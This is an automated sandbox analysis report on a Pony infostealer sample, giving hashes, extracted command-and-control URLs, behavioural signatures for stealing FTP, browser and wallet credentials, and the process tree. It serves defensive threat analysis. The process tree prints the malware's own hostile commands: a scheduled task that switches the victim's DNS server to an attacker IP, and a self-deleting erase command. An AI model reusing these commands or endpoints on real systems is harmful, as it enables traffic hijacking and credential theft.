Analysis
- max time kernel: 86s
- max time network: 73s
- platform: windows7_x64
- resource: win7-20220812-en
- resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
- submitted: 20/10/2022, 20:29
Static task: static1

Behavioral task: behavioral1
- Sample: 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
- Resource: win7-20220812-en

Behavioral task: behavioral2
- Sample: 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
- Resource: win10v2004-20220812-en
General
- Target: 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
- Size: 226KB
- MD5: 4505bb59758f0fa632e1b1d6e25c5450
- SHA1: 2d55b6afc4b2495d014aca850bac334e6b363816
- SHA256: 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718
- SHA512: 50ce9806c2fdc171dcf411a9564c3e08935f6a4c3e6729dfbca8327616bb8bfbeac9d6c0c9babe32f4de4876a0de089e9bacf05222be58149c1c6e517f4e510d
- SSDEEP: 1536:zP7q7CW2p0cUi/PlDxbmpfhjekGbtK01mPHD6JURJM:zPwimfwHtKTHD6uLM
Malware Config
Extracted: pony
- http://godekela.pw:571/fix/update.php
- http://voekazik.pw:571/fix/update.php
Signatures
- resource / yara_rule
  behavioral1/memory/2044-55-0x0000000000400000-0x000000000041C000-memory.dmp  upx
  behavioral1/memory/2044-56-0x0000000000400000-0x000000000041C000-memory.dmp  upx
  behavioral1/memory/2044-57-0x0000000000400000-0x000000000041C000-memory.dmp  upx
  behavioral1/memory/2044-62-0x0000000000400000-0x000000000041C000-memory.dmp  upx
  behavioral1/memory/2044-64-0x0000000000400000-0x000000000041C000-memory.dmp  upx
  behavioral1/memory/2044-65-0x0000000000400000-0x000000000041C000-memory.dmp  upx
  behavioral1/memory/2044-66-0x0000000000400000-0x000000000041C000-memory.dmp  upx
  behavioral1/memory/2044-71-0x0000000000400000-0x000000000041C000-memory.dmp  upx
- Deletes itself (1 IoCs)
  pid 460  Process cmd.exe
- Reads data files stored by FTP clients (2 TTPs)
  Tries to access configuration files associated with programs like FileZilla.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
- Checks installed software on the system (1 TTPs)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
- Suspicious use of SetThreadContext (1 IoCs)
  description: PID 1088 set thread context of 2044;  pid 1088;  Process 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe;  procid_target 26
- Drops file in Windows directory (1 IoCs)
  description: File created;  ioc C:\Windows\calc2.exe;  Process 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Runs ping.exe (1 TTPs, 1 IoCs)
  pid 1048  Process PING.EXE
- Suspicious use of AdjustPrivilegeToken (32 IoCs)
  All 32 entries are by pid 2044 (Process 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe); each of the following eight tokens appears four times, in this order:
  Token: SeImpersonatePrivilege
  Token: SeTcbPrivilege
  Token: SeChangeNotifyPrivilege
  Token: SeCreateTokenPrivilege
  Token: SeBackupPrivilege
  Token: SeRestorePrivilege
  Token: SeIncreaseQuotaPrivilege
  Token: SeAssignPrimaryTokenPrivilege
- Suspicious use of WriteProcessMemory (25 IoCs)
  description / pid / Process / procid_target
  PID 1088 wrote to memory of 2044  1088  31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe  26  (9 entries)
  PID 2044 wrote to memory of 944   2044  31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe  27  (4 entries)
  PID 944 wrote to memory of 288    944   cmd.exe  29  (4 entries)
  PID 2044 wrote to memory of 460   2044  31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe  30  (4 entries)
  PID 460 wrote to memory of 1048   460   cmd.exe  32  (4 entries)
Processes
1. C:\Users\Admin\AppData\Local\Temp\31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
   "C:\Users\Admin\AppData\Local\Temp\31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe"
   - Suspicious use of SetThreadContext
   - Suspicious use of WriteProcessMemory
   PID: 1088
   2. C:\Users\Admin\AppData\Local\Temp\31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
      "C:\Users\Admin\AppData\Local\Temp\31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe"
      - Drops file in Windows directory
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 2044
      3. C:\Windows\SysWOW64\cmd.exe
         "C:\Windows\System32\cmd.exe" /c at 01:33:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.200", "8.8.8.8")
         - Suspicious use of WriteProcessMemory
         PID: 944
         4. C:\Windows\SysWOW64\at.exe
            at 01:33:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.200", "8.8.8.8")
            PID: 288
      3. C:\Windows\SysWOW64\cmd.exe
         "C:\Windows\System32\cmd.exe" /c ping -n 10 localhost && erase "C:\Users\Admin\AppData\Local\Temp\31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe"
         - Deletes itself
         - Suspicious use of WriteProcessMemory
         PID: 460
         4. C:\Windows\SysWOW64\PING.EXE
            ping -n 10 localhost
            - Runs ping.exe
            PID: 1048